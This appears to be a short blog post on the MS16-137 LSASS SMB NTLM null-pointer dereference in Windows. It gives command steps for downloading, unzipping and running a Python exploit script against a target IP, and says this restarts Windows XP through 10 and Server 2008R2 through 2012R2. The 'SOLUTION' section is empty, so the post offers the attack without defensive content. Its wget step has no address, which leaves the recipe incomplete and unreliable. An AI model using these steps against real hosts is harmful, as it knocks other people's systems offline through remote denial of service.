LSASS SMB NTLM Exchange Null-Pointer Dereference (MS16-137)

SOURCE:
This attack successfully restarted Windows XP-10 and 2008R2-2012R2
# wget
# unzip 40744
# python Lsass-remote.py targetip
Target windows will be restarted

SOLUTION:
Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s